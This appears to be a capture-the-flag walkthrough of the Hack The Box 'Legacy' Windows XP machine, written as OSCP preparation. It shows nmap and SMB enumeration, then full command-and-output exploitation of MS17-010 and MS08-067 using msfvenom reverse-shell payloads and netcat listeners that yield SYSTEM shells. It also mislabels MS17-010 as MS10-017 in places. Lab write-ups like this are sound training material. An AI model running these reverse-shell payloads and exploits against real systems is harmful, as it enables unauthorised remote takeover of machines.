TJ_Null’s OSCP Prep – HTB – Legacy

This Windows XP box had two vulnerabilities. MS10-017 (Eternal blue) and MS08-067. I will in this blog post go through both of them without metasploit. For testing purpose I tried using metasploit first to verify that it was actually eternal blue.

When manually exploiting the vulnearbilites I used helviojunior’s and areyou1or0 scripts. I had alot of trouble installing pip with python2 since python2 is deprecated. I fixed it however using this method. When initially getting a shell, we are immediatly NT AUTHORITY/SYSTEM not needing to do privilege escalation.

I also switched from ParrotOS to Kali. Even though I like ParrotOS alot, using a more popular distro is better for troubleshooting and OSCP will be taken using Kali. So I made the switch and moved all my tools over to Kali. They both are great OS’s and I dont prefer one over the other.


└──╼ #nmap -sC -sV -p- --min-rate 10000 -oN nmap.result
Starting Nmap 7.92 ( ) at 2022-01-05 18:43 GMT
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.00% done; ETC: 18:46 (0:01:06 remaining)
Nmap scan report for
Host is up (0.081s latency).
Not shown: 65532 filtered tcp ports (no-response)
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h59m29s, deviation: 1h24m50s, median: 4d23h59m29s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:e4:a8 (VMware)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-01-10T22:45:36+02:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 185.20 seconds

The OS is Windows XP.

There were only two ports open. Port 139 and port 445. Port 445 gave us a hint that this might be an eternal blue vulnerability.

Using NMAPS vuln scripts I verfied that the target was vulnerable to MS10-017 and MS08-067.

└─# nmap --script vuln        
Starting Nmap 7.92 ( ) at 2022-01-06 16:14 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.038s latency).
Not shown: 997 filtered tcp ports (no-response)
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-cve2009-3103: 
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|     Disclosure date: 2009-09-08
|     References:
| smb-vuln-ms08-067: 
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|     Disclosure date: 2008-10-23
|     References:

Nmap done: 1 IP address (1 host up) scanned in 83.30 seconds

From MITRE on MS08-067

[…] allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization[…]

and on MS10-017

 […] allows remote attackers to execute arbitrary code via crafted packets, aka “Windows SMB Remote Code Execution Vulnerability. […]

From the NMAP output we can see that the OS is Windows XP.

| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)

Enumeration SMB

Using enum4linux

└─# enum4linux -A
Unknown option: A
Starting enum4linux v0.8.9 ( ) on Thu Jan  6 16:48:54 2022

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: HTB

|    Nbtstat Information for    |
Looking up status of
        LEGACY          <00> -         B <ACTIVE>  Workstation Service
        HTB             <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        LEGACY          <20> -         B <ACTIVE>  File Server Service
        HTB             <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        HTB             <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-B9-54-63

|    Session Check on    |
[+] Server allows sessions using username '', password ''

|    Getting domain SID for    |
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

|    OS information on    |
Use of uninitialized value $os_info in concatenation (.) or string at ./ line 464.
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

|    Users on    |
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

|    Share Enumeration on    |
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on

|    Password Policy Information for    |
[E] Unexpected error from polenum:

[+] Attaching to using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

[E] Failed to get password policy with rpcclient

|    Groups on    |

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

|    Users on via RID cycling (RIDS: 500-550,1000-1050)    |
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

|    Getting printer info for    |
No printers returned.

enum4linux complete on Thu Jan  6 16:48:58 2022

Nothing too interesting. We will now try to get a shell on the box.

Initial Access

There are two methods to getting shell on this box wihtout using metasploit. The first method is using MS17-010. In this method we generate a msfvenom payload, and use send_and_execute script from helviojuniors repository. This script sends the generated payload to the target machine and execute it, giving us a conneciton with netcat. This script will not crash the target.

The second method, MS08-067 is kind of the same; we generate a payload in msfvenom and add the payload to the script. The script need to know the version of the OS we are using. This script will crash the target, so if you choose the wrong version you have to resett the machine.

Method 1 – MS17-010

First we generate a payload using msfvenom.

└─# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe > ms17–010.exe

This payload uses reverse_tcp, setting the LHOST to our attacking machine, and LPORT of our own choosing. The file extension will be exe and output this to ms17_010.exe.

We then start a netcat listener and execute the script.

└─# python2 ms17–010.exe 445                                                            2 ⚙
Trying to connect to
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x821e6010
SESSION: 0xe21b8428
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1769b10
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1769bb0
overwriting token UserAndGroups
Sending file IX9SAW.exe...
Opening SVCManager on
Creating service FLSs.....
Starting service FLSs.....
The NETBIOS connection with the remote host timed out.
Removing service FLSs.....
ServiceExec Error on:

Looking at our listener, we should have a shell.

└─# netcat -lvnp 4444                                                                                      1 ⨯
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


Method 2 – MS08-067

We first generate a payload using msfvenom. This EXITFUNC option sets a function hash in the payload that specifies a. DLL and function to call when the payload is complete.

└─# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] = 

Copy the payload and paste in the script.

In the scripts there are 7 options to set the correct OS. Since from our enumeration stage know that this is a Windows XP machine, this narrows it down.

Start a netcat listneer and then run this script using this command.

└─# python2 6 445 

Looking at our listener we see that we have a shell.

└─# netcat -lvnp 4444                    
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 1049
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


Further enumeration

Since the shell spawned in both methods are NT Authority/SYSTEM we dont need to privilege escalate and can just read both the user.txt and root.txt.

We could however enumerate further so get a idea of what we are looking at. Since we had to know the SP using method 2, we know that this box run Service Pack 3.

Listing the users we can see that there are two users, john and Administrator.

C:\>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
C:\>net users
net users

User accounts for \\

Administrator            Guest                    HelpAssistant            
john                     SUPPORT_388945a0         
The command completed with one or more errors.

Similar Posts